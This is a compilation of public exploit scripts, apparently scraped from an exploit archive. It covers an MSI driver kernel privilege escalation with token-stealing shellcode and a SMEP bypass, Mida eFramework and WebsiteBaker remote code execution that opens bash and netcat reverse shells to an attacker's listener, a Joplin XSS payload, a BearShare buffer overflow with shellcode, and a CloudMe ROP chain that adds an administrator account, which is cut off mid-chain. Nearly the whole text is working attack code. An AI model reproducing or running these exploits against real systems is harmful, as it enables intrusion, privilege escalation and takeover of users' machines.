ISHACK AI BOT

/* Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation Date: 2020-09-24 Exploit Author: Matteo Malvica Vendor Homepage: https://www.msi.com Software Link: https://msi.gm/ABLTMNB Driver: MSIO64.sys SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD Version: 1.0.0.8 Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406] MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation CVE: CVE-2020-17382 Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/ Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities */ #include <iostream> #include <string> #include <Windows.h> #include <Psapi.h> #pragma warning( disable : 6387 ) VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) { // SHELLCODE FOR 1709 BYTE token_steal[] = "\x65\x48\x8B\x14\x25\x88\x01\x00\x00" // mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR "\x4C\x8B\x82\xB8\x00\x00\x00" // mov r8, [rdx + b8h] ; _EPROCESS (kd> u PsGetCurrentProcess) "\x4D\x8B\x88\xe8\x02\x00\x00" // mov r9, [r8 + 2e8h] ; ActiveProcessLinks list head "\x49\x8B\x09" // mov rcx, [r9] ; Follow link to first process in list //find_system_proc: "\x48\x8B\x51\xF8" // mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId "\x48\x83\xFA\x04" // cmp rdx, 4 ; Process with ID 4 is System process "\x74\x05" // jz found_system ; Found SYSTEM token "\x48\x8B\x09" // mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer "\xEB\xF1" // jmp find_system_proc ; Loop //found_system: "\x48\x8B\x41\x70" // mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token "\x24\xF0" // and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure //find cmd "\x48\x8B\x51\xF8" // mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId "\x48\x81\xFA\x99\x99\x00\x00" // cmp rdx, 0d54h ;UniqueProcessId == ZZZZ? (PLACEHOLDER) "\x74\x05" // jz found_cmd ;YES - move on "\x48\x8B\x09" // mov rcx, [rcx] ;NO - next entry in list "\xEB\xEE" // jmp find_cmd ;loop // found cmd "\x48\x89\x41\x70" // mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token "\x48\x31\xc9" // xor rcx rcx ; clear some registers to avoid issues while unwinding the call stack "\x48\x31\xc0" // xor rax rax "\x48\x31\xf6" // xor rsi,rsi "\x48\x31\xff" // xor rdi, rdi "\x4D\x31\xC0" // xor r8, r8 "\x48\xc7\xc1\xf8\x06\x15\x00" // mov rcx, 0x1506f8 ; move original cr4 value into rcx "\xc3"; // ret ; RET token_steal[54] = pid; token_steal[55] = pid >> 8; LPVOID allocated_shellcode = VirtualAlloc(NULL, sizeof(token_steal), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(allocated_shellcode, token_steal, sizeof(token_steal)); INT64 pop_rcx_offset = kernel_base + 0x15fc70; // gadget 1 1709 - pop rcx ; ret INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret INT64 wbindv_offset = kernel_base + 0x1175c0;; // gadget 3 1709 - wbinvd; ret INT64 rcx_value = 0x506f8; // value we want placed in cr4 in order to disable SMEP INT64 rcx_old_value = 0x1506f8; // original cr4 value INT64 ret = pop_rcx_offset + 1; // RET NOP puts("[+] SMEP disabled"); BYTE input_buff[136] = { 0 }; memset(input_buff, '\x41', 64); memset(input_buff, '\x42', 8); // dummy RBP memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8); // pop rcx memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx memcpy(input_buff + 120, (PINT64)&ret, 8); // RETNOP to restore the stack memcpy(input_buff + 128, (PINT64)&ret, 8); // RETNOP to restore the stack printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode); DWORD lpBytesReturned = 0x0; BOOL triggerIOCTL = DeviceIoControl(hFile, IoControlCode, input_buff, sizeof(input_buff), NULL, 0, &lpBytesReturned, NULL); if (!triggerIOCTL) { printf("[!] DeviceIoControl failed: %d\n", GetLastError()); } else { puts("[+] SMEP re-enabled"); puts("[+] Enjoy your SYSTEM shell\n"); } system("start cmd.exe"); } LPVOID GetBaseAddr(const char* drvname) { LPVOID drivers[1024]; DWORD cbNeeded; int nDrivers, i = 0; if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { char szDrivers[1024]; nDrivers = cbNeeded / sizeof(drivers[0]); for (i = 0; i < nDrivers; i++) { if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) { if (strcmp(szDrivers, drvname) == 0) { return drivers[i]; } } } } return 0; } HANDLE GetDriverHandle() { HANDLE hMsio; hMsio = CreateFileA("\\\\.\\MsIo", FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL); if (hMsio == INVALID_HANDLE_VALUE) { printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError()); exit(1); } return hMsio; } int main() { puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica"); DWORD IoControlCode = 0x80102040; HANDLE hDevice = GetDriverHandle(); INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe"); DWORD pid = GetCurrentProcessId(); eopMsio(hDevice, nt, pid, IoControlCode); return 0; }

# Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution # Google Dork: Server: Mida eFramework # Date: 2020-08-27 # Exploit Author: elbae # Vendor Homepage: https://www.midasolutions.com/ # Software Link: http://ova-efw.midasolutions.com/ # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html # Version: <= 2.8.9 # CVE : CVE-2020-15922 #! /usr/bin/python3 # -*- coding: utf-8 -*- import argparse import base64 import random import requests import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def print_disclaimer(): print(""" --------------------- Disclaimer: 1) For testing purpose only. 2) Do not attack production environments. 3) Intended for educational purposes only and cannot be used for law violation or personal gain. 4) The author is not responsible for any possible harm caused by this material. ---------------------""") def print_info(): print(""" [*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922) [*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html [*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php - Reverse Shell ./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP rev-PORT """) def run_cmd(url,ip,port): rev_shell = "sudo bash -i >& /dev/tcp/{0}/{1} 0>&1".format(ip,port) print("[+] Reverse shell: {0}".format(rev_shell)) data = { "submit":"True", "ipaddress0":"; {0}".format(rev_shell), "netmask0":"", "gateway0":"", "dns1":"", "dns2":"" } # exec rev shell print("[*] Starting reverse shell to {0} {1}...".format(ip,port)) try: r = requests.post(url,data=data,verify=False,timeout=1) except requests.exceptions.ReadTimeout: print("[?] ...check if it worked") pass def main(): print_info() print_disclaimer() parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="the complete target URL") parser.add_argument("ip", type=str, help="the ip address for reverse shell") parser.add_argument("port", type=str, help="the port for reverse shell") args = parser.parse_args() run_cmd(args.target, args.ip, args.port) if __name__ == '__main__': main()

# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC) # Date: 2020-09-21 # Exploit Author: Ademar Nowasky Junior (@nowaskyjr) # Vendor Homepage: https://joplinapp.org/ # Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe # Version: 1.0.190 to 1.0.245 # Tested on: Windows / Linux # CVE : CVE-2020-15930 # References: # https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff # 1. Technical Details # An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag. # HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE. # If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application. # 2. PoC # Paste the following payload into a note: <embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>"> # 2.1 RCE with user interaction # Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit. # By default, notes are stored in the last notebook created. <!-- exploit.html --> <script> x = new XMLHttpRequest; j = { title: "CVE-2020-15930", body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>" }; x.open("POST", "http://127.0.0.1:41184/notes"); x.send(JSON.stringify(j)); </script> # To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint. <!-- notebooks.html --> <script> x = new XMLHttpRequest(); x.onreadystatechange = function() { if (x.readyState == XMLHttpRequest.DONE) { alert(x.responseText); } } x.open('GET', 'http://127.0.0.1:41184/folders'); x.send(); </script>

# Title: BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC) # Date: 2020-09-29 # Author: Christian Vierschilling # Vendor Homepage: http://www.bearshareofficial.com/ # Software Link: http://www.oldversion.com.de/windows/bearshare-lite-5-2-5 # Versions: 5.1.0 - 5.2.5 # Tested on: Windows 10 x64 EN/DE # CVE: NA # --- EXPLOTATION INSTRUCTIONS --- # # 1. Adjust the values for "jmp_esp" and "shellcode" if needed # 2. Run the script to generate a file pwn.txt, containing your payload # 3. Open pwn.txt on your target (!!) (e.g. in the browser or locally) and copy the contents into the clipboard # 4. Start BearShare, click on "Advanced..." and a new window will pop up. Put the payload from pwn.txt into the field "Keywords:" within the new window. Click on "Search" in this window and your payload will be executed. # --- PAYLOAD CONSTRUCTION --- # #!/usr/bin/python import binascii # Detected the offset for overwriting the EIP register using pattern_create and pattern_offset: [*] Exact match at offset 524 junk1 = 524*"A" # Address for a JMP ESP instruction found in MSVBVM60.DLL using mona.py (You will probably need to adjust this if using another OS, language etc.) # \x66\x06\x05\x35 jmp_esp = binascii.unhexlify('35050666') # Using another 4 bytes to align the stack for clean shellcode execution junk2 = 4*"B" # As we are limited to only being able to insert alphanumeric characters, we'll create an appropriate shellcode using msfvenom. Copy the output off the following command into the variable "shellcode" below: # msfvenom -p windows/exec cmd=calc.exe BufferRegister=esp -e x86/alpha_mixed shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8k2s0C0ePsPmYKUFQKpu4nk2ptpLKf26lLK3bTTNk1bexVoH7aZWVuaiollUl3QSLtBTlepyQZofmWqZgIrjRqBrwlKRrvpLK3zgLnkbl4Qt8hc3xc1HQv1lK2ya05QkcLK3ytXzCtzg9LKednkvaN6UaioNLzaZotM7qzgvXkPQeJVEScMIhWKQmq4T5xdChnkcha47qYCPfnkFlpKlKaHeLgqjsnk6dLKc1HPlI0Da4FDqKSkE1V9CjcaYoypcoaO0ZlKTRZKnm3msZ7qnmMUX230s05Pbpe8dqNkPoMWkO9EMkHpmenBcfU8MvnuMmMMKO9EelTFQlEZK0Ikm0puWumk1WuCD2PosZ7p1CyoxU3Se1bLbCDn55qhCUuPAA" # assemble payload payload = junk1 + jmp_esp + junk2 + shellcode # write payload into pwn.txt f = open("pwn.txt", 'w') f.write(payload) f.close()

# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution # Date: 2020-07-04 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://websitebaker.org/pages/en/home.php # Software Link: https://wiki.websitebaker.org/doku.php/downloads # Version: 2.12.2 # Tested on: Windows 10 and Ubuntu 18.04 # Note : You start listener before execute (e.g netcat) then procide listener ip and port import requests import re from bs4 import BeautifulSoup import sys import getopt options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport=']) for opt, arg in options: if opt in ('-h'): print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT') exit() elif opt in ('-t'): main_url = arg elif opt in ('-u'): usr = arg elif opt in ('-p'): passwd = arg elif opt in ('-i', '--lhost'): lhost = arg elif opt in ('-l' , '--lport'): lport = arg reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f" shell_code_eval = "echo system('"+ reverse_shell_code + "');" print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n") ##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS url = main_url+"/admin/login/index.php" req = requests.get(url) login_page = req.text soup = BeautifulSoup(login_page, 'html.parser') username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value'] password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value'] weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name'] weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value'] #LOGIN TO GET SESSIoN_COOKIE login_page = requests.Session() burp0_url = main_url+"/admin/login/index.php" burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr, password_par : passwd, "submit": ''} r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False) cok = r.headers['Set-Cookie'] cok = cok.split(' ')[0] cookie_par = cok.split('=')[0] cookie_val = cok.split('=')[1].replace(';','') session_cookie = cookie_par + "=" + cookie_val ##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS url = main_url+"/admin/pages/index.php" cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) create_page = req.text soup = BeautifulSoup(create_page, 'html.parser') weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name'] weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value'] ##Create Code Page to Put Shell Code create_page = requests.session() burp0_url = main_url+"/admin/pages/add.php" burp0_cookies = {cookie_par : cookie_val} burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"} c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) ##FIND THE PAGE ID url = main_url+"/admin/pages/index.php" cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) find_id = req.text soup = BeautifulSoup(find_id, 'html.parser') pageid = soup.find_all('option',string='exploit-shell')[0]['value'] ##HTML PARSE TO PUT SHELL CODE url = main_url+'/admin/pages/modify.php?page_id='+pageid cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) add_shellcode = req.text soup = BeautifulSoup(add_shellcode, 'html.parser') weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name'] weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value'] ##ADD SHELL CODE session = requests.session() burp0_url = main_url+"/modules/code/save.php" burp0_cookies = {cookie_par : cookie_val} burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval} a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) # Exploit Author: Bobby Cooke (boku) # CVE: CVE-2018-6892 # Date: 2020-09-29 # Vendor Homepage: https://www.cloudme.com/ # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: 1.11.2 # Tested On: Windows 10 (x64) - 10.0.19041 Build 19041 # Script: Python 2.7 # Notes: # This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the # Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be # running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required # to create new users on the system. This exploit has been tested against multiple Windows 10 systems # including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF. # CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR) import os,sys,socket,struct from colorama import Fore, Back, Style F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0] def formatMsg(STRING): return ok+S[3]+F[5]+STRING+S[0] def formatErr(STRING): return err+S[3]+F[2]+STRING+S[0] # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename # ------------------------------------------------------------------------------------------------------- # 0x69900000 | 0x69ac1000 | False | False | False | False | False | [Qt5Network.dll] # 0x6eb40000 | 0x6eb64000 | False | False | False | False | False | [libgcc_s_dw2-1.dll] # 0x68a80000 | 0x69055000 | False | False | False | False | False | [Qt5Core.dll] # 0x00400000 | 0x00831000 | False | False | False | False | False | [CloudMe.exe] # 0x6d9c0000 | 0x6da0c000 | False | False | False | False | False | [Qt5Sql.dll] # 0x64b40000 | 0x64b5b000 | False | False | False | False | False | [libwinpthread-1.dll] # 0x66e00000 | 0x66e3d000 | False | False | False | False | False | [Qt5Xml.dll] def getESP_RC(): GaDG3Tz = [ # ESP -> EDI # Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP # Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core 68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr 0x68bb4678, # POP EBX # RETN [Qt5Core.dll] 0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory 0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP 0x68D50537 # RETN - ROPNOP ] print(formatMsg("Get ESP ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def msvcrt_rop_chain(): GaDG3Tz = [ # HMODULE LoadLibraryA( LPCSTR lpLibFileName); # $ ==> > CALL to LoadLibraryA # $+4 > FileName = "msvcrt.dll" # EAX = 0x512 = 1298 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFAEE, # NEG FFFFFAEE = 0x512 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "msvcrt.dll" 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "msvcrt.dll" 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -0xA = 0xFFFFFFF6 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFF6, # -0xA # ESI = Start of string "msvcrt.dll\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EAX = PTR LoadLibraryA (from CloudMe Import Table) # CloudMe Address=0081A168 Section=.idata Type=Import (Known) Name=KERNEL32.LoadLibraryA 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = kernel32.LoadLibraryA 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] # ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00" 0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll] # For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x6990F972, # RETN 10 [Qt5Network.dll] 0x68f7bc5e, # pushad # ret # [Qt5Core.dll] # EAX -> EBP = msvcrt.dll 0x68cc462c # XCHG EAX,EBP # RETN [Qt5Core.dll] # EBP = msvcrt.dll ] print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def GetProc_system_rop_chain(): GaDG3Tz = [ # FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName); # $ ==> > CALL to GetProcAddress # EDX (ROPNOP) # $+4 > hModule = [msvcrt] # ECX # $+8 > ProcNameOrOrdinal (system) # EAX # EAX = 0x4a2 = 1186 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "system" 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "system" 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -0x6 = 0xFFFFFFFA 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFA, # -0x6 # ESI = Start of string "system\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] 0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets) # EAX = PTR GetProcAddr (from CloudMe Import Table) # CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll # For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP # EBP -> EAX = msvcrt.dll 0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll] # ECX=&msvcrt.dll # EAX=["system\x00"] 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # EDX=ROPNOP 0x68f94685, # POP EDX # RETN [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x699010B4, # ret 0C [Qt5Network.dll] # KERNEL32.GetProcAddress [ESI pushed to stack] # [EBP pushed to stack] # [ESP pushed to stack] # [EBX pushed to stack] # land after ret 0xC -> Qt5Core.68D50537 (ROPNOP) [EDX pushed to stack] # MSVCRT.75F60000 [ECX pushed to stack] # ASCII "system" [EAX pushed to stack] 0X68f7bc5e, # pushad # ret # [Qt5Core.dll] 0x68b1df17 # XCHG EAX,EDX # RETN # [Qt5Core.dll] # EDX = msvcrt.system ] print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def addUsr_rop_chain(): GaDG3Tz = [ # int system( const char *command); # $ ==> > CALL to system # $+4 > command = "net user boku 0v3R9000! /add" # EAX = 0x438 = 1080 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "net user..." 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "net user..." 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -28 = -0x1C = 0xFFFFFFE4 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFE4, # -28 = -0x1C # ESI = Start of string "net user...\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EDX = MSVCRT.system # ECX=0x0 # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] # ESI = MSVCRT.system # EAX = ["net user.."] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x6990F972, # RETN 10 [Qt5Network.dll] # PUSHAD - Setup Call to MSVCRT.system on stack 0X68f7bc5e # pushad # ret # [Qt5Core.dll] ] print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def addAdm_rop_chain(): GaDG3Tz = [ # ESI = msvcrt.system # ESI -> EDX 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] # EAX = 0x3F7 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "net local..." 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "net local..." 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -39 = -0x27 = 0xFFFFFFE4 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFD9, # -39 = -0x27 # ESI = Start of string "net local...\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EDX = MSVCRT.system # ECX=0x0 # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] # ESI = MSVCRT.system # EAX = ["net local.."] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 